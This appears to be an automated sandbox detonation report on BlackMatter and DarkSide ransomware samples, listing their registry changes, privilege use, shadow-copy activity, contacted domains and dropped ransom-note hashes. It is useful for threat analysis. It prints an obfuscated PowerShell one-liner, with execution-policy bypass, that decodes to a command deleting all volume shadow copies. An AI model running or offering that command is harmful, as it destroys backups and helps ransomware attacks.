2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1778s

Max time network

1153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

Signatures

BlackMatter Ransomware

ransomware blackmatter

Renames multiple (153) files with added filename extension

ransomware

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\YgLqz8iqA.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\YgLqz8iqA.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 paymenthacks.com udp
US 204.11.56.48:443 paymenthacks.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 204.11.56.48:80 paymenthacks.com tcp
US 8.8.8.8:53 mojobiden.com udp
US 15.197.148.33:443 mojobiden.com tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 48.56.11.204.in-addr.arpa udp
US 8.8.8.8:53 33.148.197.15.in-addr.arpa udp
US 8.8.8.8:53 36.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 15.197.148.33:80 mojobiden.com tcp
US 204.11.56.48:443 paymenthacks.com tcp
US 204.11.56.48:80 paymenthacks.com tcp
US 15.197.148.33:443 mojobiden.com tcp
US 15.197.148.33:80 mojobiden.com tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp

Files

memory/4484-1-0x0000000002E70000-0x0000000002E80000-memory.dmp

memory/4484-0-0x0000000002E70000-0x0000000002E80000-memory.dmp

C:\YgLqz8iqA.README.txt

MD5 f66968c47a64569e2281f65a95991be0
SHA1 ef9e3e80bfbea4c3021b226cb8cd00687013b8a8
SHA256 4b950c763006e7c4569df8742855cec31bf82f835bd7e2bdcb5f128db34c82bf
SHA512 cb4ace1b3e891ab100b3950c6bc133b216e91c8978a3af1ffd75617b606bb7ceb0133f44d37a30a827655e5b84b016d736a732f5f37635bb727e1a5b722cad24

memory/4484-227-0x0000000002E70000-0x0000000002E80000-memory.dmp

memory/4484-226-0x0000000002E70000-0x0000000002E80000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240705-en

Max time kernel

1560s

Max time network

1578s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

Signatures

DarkSide

ransomware darkside

Renames multiple (153) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f0e1586e.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f0e1586e.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f0e1586e.ico" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.f0e1586e C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.f0e1586e\ = "f0e1586e" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e\DefaultIcon C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 catsdegree.com udp
US 13.248.169.48:443 catsdegree.com tcp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.0.127.10.in-addr.arpa udp
US 13.248.169.48:443 catsdegree.com tcp

Files

memory/2380-0-0x0000000001350000-0x0000000001367000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabC62.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarCB3.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/1760-40-0x000007FEF518E000-0x000007FEF518F000-memory.dmp

memory/1760-41-0x000000001B580000-0x000000001B862000-memory.dmp

memory/1760-42-0x00000000027A0000-0x00000000027A8000-memory.dmp

memory/1760-43-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/1760-44-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/1760-45-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/1760-46-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/2380-47-0x0000000001350000-0x0000000001367000-memory.dmp

memory/1760-49-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 91a207778ee0970b4289a281bc319e08
SHA1 7af869acec9a13181b41df5014599d0e0494f1ed
SHA256 1ced3b518f4d7b84f40fcd894713af12a97ae9732cabee15b35944b10593d224
SHA512 ee6613e6e10a06269720b6ce25e271751d45327b11b7cde4fab5161dc8e41105ba8161f8f91c98f66440800ad19a6e189219f6328b5427f24913357fe8dda4ca

C:\Users\Admin\README.f0e1586e.TXT

MD5 f418a249405444da33cc73b402a26306
SHA1 1a6c493e74036f93f0dae4b65e6c543c213ce418
SHA256 b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09
SHA512 b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf

memory/2380-188-0x0000000001350000-0x0000000001367000-memory.dmp

memory/2380-241-0x0000000001350000-0x0000000001367000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

